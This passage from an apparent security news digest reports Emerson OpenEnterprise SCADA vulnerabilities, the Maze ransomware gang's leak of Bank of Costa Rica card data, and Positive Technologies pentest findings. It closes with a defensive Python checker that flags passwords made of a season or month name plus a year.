The first two, tracked as CVE-2020-6970 and CVE-2020-10640, are rated critical, as they can allow an attacker to remotely execute arbitrary code with 'elevated privileges' on devices running OpenEnterprise.

Vladimir Dashchenko, a security expert at Kaspersky, says an attacker could exploit these vulnerabilities either from within the network or directly from the internet. However, there do not appear to be any instances of the affected product exposed to the internet.

“The most critical vulnerabilities allow remote attackers to execute any command on a computer with OpenEnterprise on it with system privileges, so this might lead to any possible consequences,”

“Based on Shodan statistics, currently there are no directly exposed OpenEnterprise SCADA systems available,” Dashchenko explained. “It means that asset owners with installed OpenEnterprise are definitely following the basic security principles for industrial control systems.”

The remaining vulnerabilities can be exploited to 'escalate privileges' and to obtain passwords for OpenEnterprise user accounts, but exploitation in both cases requires local access to the targeted system.

Maze Ransomware Operators Leaked 2GB of Financial Data from Bank of Costa Rica (BCR)


Bank of Costa Rica (BCR) has been receiving threats from the threat actors behind Maze ransomware, who have stolen credit card details from the bank; this week the ransomware gang started publishing the encrypted financial details.

Banco de Costa Rica is one of the strongest state-owned commercial banks operating in Costa Rica. From humble origins as a mainly private commercial bank, it expanded to become a currency issuer and one of the most renowned banking firms in Central America, contributing substantially to the financial development of the nation.

The hacker group behind the data leak has demanded a ransom from Banco de Costa Rica on various occasions. According to an interview with the Maze ransomware operators, however, they observed a lack of seriousness in the way the bank dealt with the previous leaks, and that was the primary motivation for the latest data leak.

As per the claims made by the attackers, Banco de Costa Rica's network remained insecure until February 2020: they first compromised the bank's network in August 2019, and a second attempt was made in February 2020 to see how security had been improved, if at all.

The 2GB of data published by the Maze ransomware attackers on their leak site contains the details of at least 50 Mastercard and Visa credit or debit cards, a few of them listed more than once.

As per statements given to ISMG by Brett Callow, a threat analyst with Emsisoft, "Like other groups, Maze now weaponizes the data it steals,"

"The information is no longer simply published online; it's used to harm companies' reputations and attack their business partners and customers."

"The Maze group is a for-profit criminal enterprise who are out to make a buck," Callow says. "The credit card information has been posted for one of two reasons: Either to pressure BCR into paying and/or to demonstrate the consequences of non-compliance to their future victims," Callow added.

Russian experts assessed the level of protection of corporate data from hacker attacks


Even a low-skilled hacker can break into the internal network of a global company, and an experienced attacker needs no more than half an hour to penetrate the local network. Such were the conclusions reached by experts from Positive Technologies in their research.

"It took an average of four days to penetrate the local network, and at least 30 minutes. In most cases, the complexity of the attack was estimated as low, that is, a low-skilled hacker who possesses only basic skills could also carry it out," said experts.

Positive Technologies experts analyzed 2019 data on the protection of the corporate information systems of 28 companies from external intruders, gathered through penetration tests (pentests). During external pentests, specialists managed to penetrate the local networks of 93% of the organizations. In some cases, there were several ways to overcome the network protection.

According to the experts, one in six companies showed signs of hacker attacks, such as malicious links on official sites or valid accounts in public leak databases. Based on this, the researchers concluded that the company's IT infrastructure could already be under the control of hackers.

For protection, the specialists advise companies first to follow the general principles of information security: regularly audit their information resources that are reachable from outside, develop strict rules for a corporate password policy, and monitor compliance with them. In addition, they recommend regularly updating the security settings of operating systems and installing the latest versions of software products.

Recall that, according to Kaspersky Lab, in April the number of attacks on the infrastructure of Russian organizations whose employees work remotely exceeded 18 million, five times more than in February. Positive Technologies found that up to 48% of employee passwords in organizations are made up of a word indicating the season or month combined with four digits indicating the year.
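The "season or month plus year" pattern is something a password policy can check for directly. The following is an added example, not code from Positive Technologies or from the page: a small policy check that flags candidate passwords built from an English season or month name and a four-digit year, tolerating common decorations (a trailing "!" or "#", a separator, and digit-for-letter substitutions such as "Summ3r"), and a helper that reports what share of a password list follows the pattern. The word list, the accepted year range, and the sample passwords are all assumptions constructed for the example.

```python
"""Flag passwords of the form <season|month><year> (added example; the
word list, year range and sample data are assumptions, not the research's)."""
import re

# English season and month names. Assumption: the research did not publish
# the exact vocabulary it counted.
SEASONS = {"spring", "summer", "autumn", "fall", "winter"}
MONTHS = {
    "january", "february", "march", "april", "may", "june", "july",
    "august", "september", "october", "november", "december",
    "jan", "feb", "mar", "apr", "jun", "jul", "aug", "sep", "sept",
    "oct", "nov", "dec",
}
# Digit/symbol substitutions that look like hardening but add no real entropy.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})
# Filler characters users bolt on to satisfy "one special character" rules.
DECORATION = "!?#*&%^+=,;:'\"()[]{}<>/\\~ "
WORD = r"[A-Za-z@$0-9]{3,9}"
SEP = r"[ _.\-]?"
FORWARD = re.compile(rf"^({WORD}){SEP}(\d{{4}})$")   # e.g. Summer2019
REVERSED = re.compile(rf"^(\d{{4}}){SEP}({WORD})$")  # e.g. 2019Summer
YEAR_MIN, YEAR_MAX = 1950, 2030  # assumed plausible year range


def weak_calendar_password(password: str):
    """Return a reason string if the password is a season/month word plus a
    four-digit year (either order, optional separator and filler), else None."""
    core = password.strip(DECORATION)
    m = FORWARD.match(core)
    if m:
        word, year = m.group(1), m.group(2)
    else:
        m = REVERSED.match(core)
        if not m:
            return None
        year, word = m.group(1), m.group(2)
    if not YEAR_MIN <= int(year) <= YEAR_MAX:
        return None
    norm = word.lower().translate(LEET)  # "Summ3r" -> "summer"
    if norm in SEASONS:
        return f"season '{norm}' + year {year}"
    if norm in MONTHS:
        return f"month '{norm}' + year {year}"
    return None


def calendar_pattern_share(passwords):
    """Share of a password list that matches the pattern, plus the matches
    with their reasons (useful for reporting a metric like the 48% figure)."""
    flagged = {}
    for pw in passwords:
        reason = weak_calendar_password(pw)
        if reason:
            flagged[pw] = reason
    share = len(flagged) / len(passwords) if passwords else 0.0
    return share, flagged


# Constructed sample list for the demonstration (not real credentials).
SAMPLE = [
    "Summer2019", "Winter2020!", "Summ3r2019", "may_2020", "Fall2018#",
    "2019Autumn",                      # reversed order is also caught
    "Summer19",                        # two-digit year: not the pattern
    "Summertime2019",                  # longer word: outside the vocabulary
    "Tr0ub4dor&3", "correct horse battery staple", "P@ssw0rd1", "Zx9$kLm2pQ7!",
]

if __name__ == "__main__":
    share, flagged = calendar_pattern_share(SAMPLE)
    for pw, why in flagged.items():
        print(f"{pw:32} {why}")
    print(f"{share:.0%} of the sample follows the calendar pattern")
```

Run as a policy hook at password-set time it rejects the weak form before it reaches the directory; run over a list recovered in a sanctioned audit of your own accounts it gives the same kind of percentage the research reports. The vocabulary is deliberately small and English-only, so a deployment would extend SEASONS and MONTHS with the languages its users actually write in.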